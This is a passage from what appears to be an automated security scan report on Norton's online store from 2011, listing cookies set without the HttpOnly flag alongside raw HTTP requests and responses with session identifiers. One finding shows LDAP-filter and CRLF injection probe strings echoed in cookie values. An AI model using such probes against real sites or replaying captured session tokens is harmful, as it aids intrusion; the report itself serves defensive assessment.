The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:44 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 54738 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.8. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:47 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 52186 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.9. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:49 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 48409 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.10. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:52 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 63835 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.11. http://buy.norton.com/estore/mf/landingProductFeatures
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/landingProductFeatures
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:18 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 55880 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js i...[SNIP]...
10.12. http://buy.norton.com/estore/mf/landingPromotion
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/landingPromotion
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/landingPromotion HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:32 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 50623 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.13. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:58 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 68924 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.14. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:02 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 73974 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.15. http://buy.norton.com/estore/mf/upgradeCenter
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/upgradeCenter
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/upgradeCenter HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:30 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 137137 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.16. http://buy.norton.com/estore/mf/upgradeRenewal
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/upgradeRenewal
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:22 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 58568 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.17. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:20 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 41047 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.18. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:17 GMT Pragma: no-cache Location: http://buy.norton.com/estore/mf/errorProductNotFound Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ Content-Language: de-CH X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 299 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/er...[SNIP]...
10.19. http://buy.norton.com/upgrades-renewals
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/upgrades-renewals
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
JSESSIONID=vxdTTqHVp98yyfVwX91lmbQpnYvxnzf3hLdx0n14FYn99LpNvJgb!-50551110; path=/
FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /upgrades-renewals HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:25 GMT Location: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=0519b9aa-f875-4235-8757-656f0af7db991315604245144 Set-Cookie: JSESSIONID=vxdTTqHVp98yyfVwX91lmbQpnYvxnzf3hLdx0n14FYn99LpNvJgb!-50551110; path=/ Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # 